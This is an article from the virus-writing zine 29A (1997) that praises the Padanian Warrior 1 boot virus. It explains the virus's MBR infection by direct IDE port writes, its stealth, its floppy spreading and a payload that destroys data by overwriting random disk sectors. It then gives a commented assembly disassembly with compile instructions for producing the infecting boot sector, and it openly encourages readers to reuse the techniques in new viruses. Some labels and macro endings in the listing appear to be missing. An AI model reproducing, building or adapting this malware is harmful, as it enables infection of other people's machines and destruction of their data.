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29A Issue 02 04 09
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Virus spotlite: Padanian Warrior 1
by b0z0/iKx, Padania 1997
Virus Name : Padanian Warrior 1
AV Name : IntCE (AVP), Int_CE (F-Prot)
Origin : Padania
Type : Boot infector
Lenght : one sector
Virus Description:
This is a very cool boot virus that infects the MBR of the hard disk
and infects any floppy disk that is accessed via DOS. This boot virus is
extremely compact and implements a lot of interesting methods and tricks.
The Padanian Warrior 1 in fact:
-> Doesn't allocate memory
-> Infects the MBR using ports
-> Makes booting from a floppy quite hard
-> Uses the 18_tech
-> Uses 386 instructions
-> Full stealth on MBR
-> Read stealth on floppy boot
-> Has a very cool method to activate the payload
-> Has a destructive payload
Of course as you may suppose due to space restriction (hey, don't say "I may
do that 25 bytes shorter" :) ) there are also some bad things in this virus,
but these will be shown later.
Now let's examine deeper every aspect of this cool virus...
Virus residency:
The virus uses a quite good way of going resident and doing his work. In fact
the virus won't allocate as usually some memory but will rather copy itself
into an unused part of the Interrupt Vector Table. Since 200h bytes may be too
much and may cause some problems with the interrupts (since you may have to
find a place with 80h unused ints) the virus will use just a little
(3Ch bytes) part of the IVT. Here the virus will copy just the vital part of
itself (this is the interrupt handler) that will provide when necessary to
load the rest of the virus body.
The virus will be copied always from 0:300 up to 0:33Ch. Another good trick
that the virus uses is to use a piece of the copied part to call the original
interrupt vector. In fact the virus will store the old interrupt vector in the
dword at 0:338h. This of course will be used to chain the call to the original
interrupt handler (doing a jmp far). But on the other side the dword at 0:338h
is also the dword for the seg:off of the interrupt number 0CEh. So the virus
instead of doing some space-consuming calls or something will just call the
interrupt 0CEh when it will need to do a call to the original Int13h (AV
name came just from this use of the 0CEh interrupt).
As already mentioned the virus uses the 18_tech (look in Xine #2 for more
explanations about this), so it won't issue any problem using windows and
will be less AV-noticeable.
Padanian Warrior interrupt handler:
Since it uses 18_tech at first it needs to correct in some way the stack.
Of course the VW decided to do the work simply with an add (instead of popping
like a good school boy :) ) and this is also a good antitrace.
The handler will check for reads or writes on the first sector of disks and
floppyes. When one interesting call is encountered the virus will save 400h
bytes from the user's buffer (this is from ES:BX) to a buffer on the hard
disk (two sectors after the virus body on the disk). Then the virus will load
its entire body in the user's buffer from the hard disk and will jump (push
seg:off and do a retf) to the just readed infection/stealth part.
If the user requested a write on the MBR the virus will just change the
call to a disk reset, if a read on the MBR occours the virus will return
the original MBR, if a write on a floppy occours the virus will just leave it
to proceed and finally if a read on the floppy is requested the virus will
infect it and then will stealth the read returning a normal DOS boot.
Of course the data that is returned for the stealth is written on the
previsiously mentioned hard disk buffer. Infact at the end of the work the
virus will jump back to the virus body permanently in memory and will just
reread to ES:BX the hard disk buffer (that may have been changed also by the
stealth routines).
MBR infection and new MBR manipulation:
The MBR infection is done at the boot from an infected floppy disk. To
determinate if the virus is already present on the hard disk it will check
if the first partition starts at sector 1 (very common). If it starts
somewhere else (because it is already infected or for some other user's
reason) the virus quits the MBR infection routine.
First of all the virus will save itself and the original MBR on two sectors
starting from 0,0,5 (cyl,side,sector) on the hd. Then it will change the
partition table of the 'new' MBR in this way:
º N. º TYPE º Partition start º
º º º C / H / S º
º 1 º orig º 0 / 0 / 5 º
º 2 º ext. º 0 / 0 / 4 º
So the first entry (the orig in type means that it will just leave the same
as it was before) will point to the virus body on the disk (so it will be
loaded at each boot from that hard disk). The second partition will point to
another modified MBR copy that the virus will put on the disk. In this second
modified MBR (at 0,0,4) the virus will just leave one extended partition that
will point to the same sector (this is to again to 0,0,4).
So if the user will try to do a boot from a clean floppy disk DOS will go
in an infinite loop looking for some other extended partition :) Of course
if the virus is active the MBR stealth provides to give the saved good MBR
when needed. Just some specific versions of DOS are able to boot from an
infected PC.
To avoid some BIOS virus protections the virus uses ports to write to the
MBR. The routine to do this is incredibly short and efficent. It consist of
a first part where the virus initializes the controller to the write (this
is just a loop using a table for the initialization sequence) and then after
a pause it will send the 200h bytes that must be written.
Floppy infection and stealth:
The virus won't save the original boot but it will just overwrite the
original one with the virus body. It will preserve just the original serial
number of the floppy. It won't even copy the BPB, but will just use the
one from the first generation (that moved around with the virus :) ) that is
part of the virus body. To see if the floppy is infected it will check the
payload word (this is at 20h of the boot sector). If this is different than
zero (set at formattation) then probably is already infected.
As for stealth the virus will just give to the user a copy of the sector
from the hard disk from 0,1,1 after coping the original BPB from the floppy
disk to the right place. This stealth method counts on the fact that usually
DOS is installed at 0,1,1 so there may be a good DOS boot sector to be used
for stealth.
Payload activation:
Also the payload activation is intelligent (even if, in my opinion, the
payload isn't). At every boot from the MBR the virus will decrement a payload
counter by one (at virus installation this will be initialized to 78h) and
when it will come to zero the payload will be activated. The real cool thing
is that on every succesfull floppy disk infection the payload counter will be
incremented by two, so on machines with a good traffic of floppyes (hehe, a
good virus distro :) ) the payload may never activate. On the other side on
closed machines that don't spread the virus the payload may activate faster.
This is a good idea, since it may not be a good thing to activate the payload
(and make anyone to understand that a virus is around by trashing all the
data on the hard disk) on a PC where a lot of floppyes are moving everyday
(for example in a PC shop, in a school or in an office), while an isolated
machine that doesn't give any profit to the virus may be attacked.
The payload is rather dummy: it will just go in an infinite loop where
ranomly selected sectors (4 at once) are overwritten by some random data.
Other goodies:
As for other goodies I may mention that the virus uses also some 386
instructions to make the code shorter and more efficent.
The real virus name is "encrypted" at the end of the virus. To get the name
you must UUENCODE the boot sector and you will see the name 8)))))
Bad virus aspects:
The virus has also some bad aspects. These aren't bugs or something like, but
are things decided to make the code shorter. Padanian Warrior 1 infact relays
to be on a system of a "normal" (say tipical if you want :) ) user. Infact for
example it relays on the fact that a DOS partition is set on 0,1,1 , that all
the diskettes (or quite all) have the same 1.44Mb format and that no other
operating systems are used (since it doesn't save the original boot sector).
But of course notice that IT FITS IN 448 bytes! So we can't pretend that it
will make check of every possible O.S. or PC :) This "Bad virus aspects"
section is only to give some ideas for future implementations and future
viruses, not to say that the virus is bad! The virus relays on many settings
and parameters from "normal" users, which are the real target of the virus
(real users anyway aren't so lame to get infected... and don't use d0$ ;)) )
and this is normal, since to make all the possible checks the virus may have
to use the entire floppy :) So, in my personal opinion, the Padanian Warrior 1
is effectively aimed to infect "normal" users and with those users it will
work really very fine, so I suppose it may have a good chance to stay in
the wild!
Description conclusion:
This is undoubtely a VERY good boot virus. It has a lot of cool things and
techs and all of this in just a sector. Expecially the port writing routine
is great for its size and the payload activation method is undoubtely very
interesting and may be interesting for payload activation for other viruses.
Well, I think that you may find many interesting tricks and implementations
that may give your next boot virus a better look :)
Greetings to the author of the Padanian Warrior 1! Hey, we all are already
waiting for the second one 8))
Virus disasm:
And here finally we come to the virus disasm, enjoy!
To compile, use TASM 3.0 (at least to get the real first generation):
tasm /l /zi /m2 pdnwar.asm
tlink /m /v pdnwar.obj
tdstrip -c pdnwar.exe
the resulting 512 bytes file must be put on a floppy boot sector...
.model tiny
; Some macros, so the source will be more clear and readable :)
; This second macro is to prevent TASM to optimize in his way the LEA
; generation... since we want the same code as in the original virus :)
lea_ok MACRO fromreg, segment, Imm16, refreg
db 08dh
ifidn <fromreg>, <di>
db 0bfh
ifidn <fromreg>, <DI>
db 0bfh
ifidn <fromreg>, <si>
db 0b7h
ifidn <fromreg>, <SI>
db 0b7h
dw Imm16
; This last macro is to prevent again a TASM optimization of add to a
; word in memory...
add_l MACRO weird, pitr, refreg, offset, drek, add_value
db 83h
db 87h
dw offset
db add_value
; End of macros... finally the real virus code! :-)
org 0
jmp short virus_start ; Jump to virus body
; Here is placed the floppy data that will _always_ go around with the virus!
; This DBs are the first generation ones.
db 04dh,053h,044h,04fh,053h,035h,02eh,030h
db 000h,002h,001h,001h,000h,002h,0e0h,000h
db 040h,00bh,0f0h,009h,000h,012h,000h,002h
db 000h,000h,000h,000h,000h,078h,000h,000h
db 000h,000h,000h,029h,000h,009h,042h,026h
db 04eh,04fh,020h,04eh,041h,04dh,045h,020h
db 020h,020h,020h,046h,041h,054h,031h,032h
db 020h,020h,020h
org 3eh
push cs
pop ss
mov sp,7c00h ; Set SS:SP to 0:7C00h
push cs
pop es
push cs
pop ds ; CS = DS = ES = SS
mov si,(offset int18_handler + 7c00h)
; copy a part of virus body
mov di,300h ; in a piece of the IVT
mov cx,(offset orig_int13 - offset int18_handler)
rep movsb
mov si,4ch ; SI on orig int13h
movsd ; save Seg:Off of int13h
; at the end of our piece
; of body (exactly at the
; place for int CEh)
push es ; save ES for later
push 0f000h
pop es ; point ES to ROM
xor bx,bx
look_for_cd18: ; 18_tech routine
inc bx
cmp word ptr es:[bx],18cdh ; search the int 18h in ROM
jne look_for_cd18
mov si,04ch ; set the int 13h to point
mov word ptr [si],bx ; to the CD18
mov word ptr [si+2],es
mov dword ptr [si+14h],300h ; new int18h handler is at
; 0:300h
pop es
mov ax,301h ; write a sector from disk
mov bx,sp ; from es:sp
mov cl,5 ; points where the virus
mov dh,0 ; resides on the hd
cmp dl,80h ; is the hd?
jb not_from_hd
dec word ptr ds:[7c20h] ; payload counter
jnz no_activation
in al,40h
xor ch,al
in al,40h ; get random offset in BX
xor cl,al ; and random sector/cylinder
and cl,1fh ; in CX
mov bx,cx
in al,40h
xor dh,al ; get random head in DH
and dh,0fh
mov ax,304h ; write 4 sectors
int 0ceh
jmp short payload
int 0ceh ; rewrite the virus body
; in its place (counter
; decreased)
mov ax,201h ; read a sector
mov cl,1 ; the MBR
push 013cdh ; set an int13h on the
; top of the stack
jmp sp ; execute the pushed int13.
; this is reload the old
; mbr (using stealth) and
; then run it
mov word ptr ds:[7c20h],78h ; initialize the payload cntr
mov ah,2 ; read one sector
mov bh,7eh ; to bx = 7E00h
mov cl,1 ; read the MBR
mov dl,80h ; from disk
int 0ceh ; do the real int13h
cmp byte ptr ds:[1bfh+bx],1 ; first partition starts at 1?
jne already_infected ; no, so probably infected or
; infection may not be ok
mov ax,302h ; write two sectors
mov bh,7ch ; bx = 7c00h
mov cl,5 ; save the virus body and
; the original mbr starting
; with sector 5
int 0ceh ; do the real int13h
mov si,7fbeh ; points to the original
; partition table
mov di,7fceh ; where to save it
mov cl,10h
rep movsb ; copy the partition table
; 10h below the original
; position
mov word ptr ds:[3bfh+bx],0500h
; puts 05 as start of first
; partition in partition tbl
mov di,7fceh ; modify the partition table
xor ax,ax ; so it will be quite hard to
stosw ; boot without the virus in
; in memory :)
mov al,4
stosw ; do virus second "partition"
mov al,5
mov si,(offset ide_prog + 7c00h)
; point to the init sequence
mov cl,7
mov dx,1f0h ; starting port - 1
; now the virus will initialize the controller, set the write mode etc...
; look at the ide_prog label for the details!
inc dx ; increase port
outsb ; write DS:SI to port DX
loop program_ide
wait_loop: ; wait a little for the ide
loop wait_loop
mov si,7e00h ; point to the 'new' MBR
mov ch,1 ; copy 200h bytes
mov dl,0f0h ; to port 1f0h
rep outsw ; write the modified MBR
mov si,7fceh ; modify also the second
mov di,7fbeh ; saved MBR that will be of
mov cl,10h ; use to confuse dos at a
rep movsb ; boot from a clean floppy
mov cl,30h ; delete the a second entry
mov al,0 ; from partition table
rep stosb
mov ax,301h ; write the second mbr to hd
mov bh,7eh ; bx to the modified mbr
mov cl,4
mov dx,80h
int 0ceh ; do the real int13h
int 19h ; reboot
; From this point the virus will be copied to 0:300h in memory and will stay
; always there...
add sp,6 ; correct stack since the
; virus uses 18_tech
cmp ah,2 ; reading?
jb leave_call
cmp ah,3 ; writing?
ja leave_call
cmp cx,1 ; on boot/mbr ?
jne leave_call
cmp dx,80h ; on floppy or hd?
ja leave_call
mov ax,302h ; save 1024 bytes from
mov cl,7 ; the buffer ES:BX on a
mov dl,80h ; buffer on the HD
int 13h
mov ax,201h ; read the entire virus
mov cl,5 ; from the HD to ES:BX
int 13h
add bx,offset infect_ste ; jump to the infection
push es ; routine (we just readed
push bx ; it from the disk)
int 13h
popf ; Pop flags
retf 2 ; Return far
db 0eah
orig_int13 dd 00h ; original seg:off of int13h
; int CEh will point on this
; doubleword
; here is the end of the part of the virus that is always in memory (starting
; from 0:300h up to 0:33Ch)
org $-4 ; The next four bytes (as
; you notice by the org :) )
; are overwritten in memory
; by the int13h seg:off, but
; are always present on the
; disk. Infact the infection
; routine is present in mem
; just when needed...
popa ; reload calling regs
mov al,01h
cmp dl,80h ; is on the HD ?
jb floppy_disk
cmp ah,03h ; writing on the MBR ??? :)
je you_wont
pusha ; it seems they are going
; to read it...
add bh,2
mov cl,6 ; read the saved one from HD
int 13h
mov ax,301h
mov cl,7 ; save it on our disk buffer
int 13h
xor ax,ax ; zero AX
jmp short exit_infect
cmp ah,2 ; are they reading?
je reading_it
int 0ceh ; well, leave the sucker
; to write and exit
jmp short exit_infect
push bx
add bh,2 ; read it in our mem buffer
int 0ceh ; (this is ES:[BX+200h])
pop bx
jc exit_infect ; exit on error
lea si,ds:[0227h + bx] ; point to the serial num
lea_ok di,ds:[ 027h + bx] ; point to the dest serial num
segcs movsd ; copy the serial number
cmp word ptr es:[220h+bx],0 ; this place is usually at
; floppy formatation 00h, so
; if it != 00h then maybe it
; is already infected and it
; may contain a payload cntr
jne no_bonus
mov ax,301h ; write virus to floppy disk
int 0CEh
jc no_bonus ; error? if so no bonus!
add_l word ptr [bx+ 20h ],02h ; add 2 to our payload counter
mov ax,301h ; rewrite the virus body
mov cl,5 ; to its usual place, but
mov dl,80h ; with the different counter
int 13h
mov ax,201h ; read the dos boot sector
add bh,2 ; that is very probably
mov cl,1 ; here. this is a good
mov dx,180h ; "normal" boot sector
int 13h
lea si,ds:[bx-200h+03h] ; point to our space for
; the bpb
lea_ok di,ds:[ 03h + bx] ; point to the dos boot
; space of the bpb
mov cl,3bh ; how many bytes we need
segcs rep movsb ; move our (floppy) bpb to
; it's place.
mov ax,301h ; write it to the buffer
mov cl,7 ; on the disk... this is
mov dh,0 ; what will be returned
int 13h ; also to the user
; this is floppy bs stealth
mov ax,202h ; read the two sectors from
mov cl,7 ; our temp disk buffer to
mov dl,80h ; his buffer in ES:BX
db 0eah ; jmp far
dw 330h ; adress of returning
dw 00h ; the segment where the virus
; resides is always 00h
; ide programming sequence
org $-1 ; one byte for ide programming
; is used directly from the
; absolute jump before
; ³ Port ³ Effect ³
db 000h ; ³ 1F1h ³ Set Precompensation to 0 ³
db 001h ; ³ 1F2h ³ Set Sector count to 1 ³
db 001h ; ³ 1F3h ³ Set Sector number to 1 ³
db 000h ; ³ 1F4h ³ Set Cylinder high to 0 ³
db 000h ; ³ 1F5h ³ Set Cylinder low to 0 ³
db 0A0h ; ³ 1F6h ³ Set Drive to 0, Head 0 ³
db 030h ; ³ 1F7h ³ Set Write sector ³
; name_stuff are bytes used for the virus name
db 070h,086h,048h,06Eh,0A6h,01Bh,0B7h,087h
db 02ch,0A9h,0BFh,024h,041h
org 01feh
boot_marker db 55h,0AAh
org 200h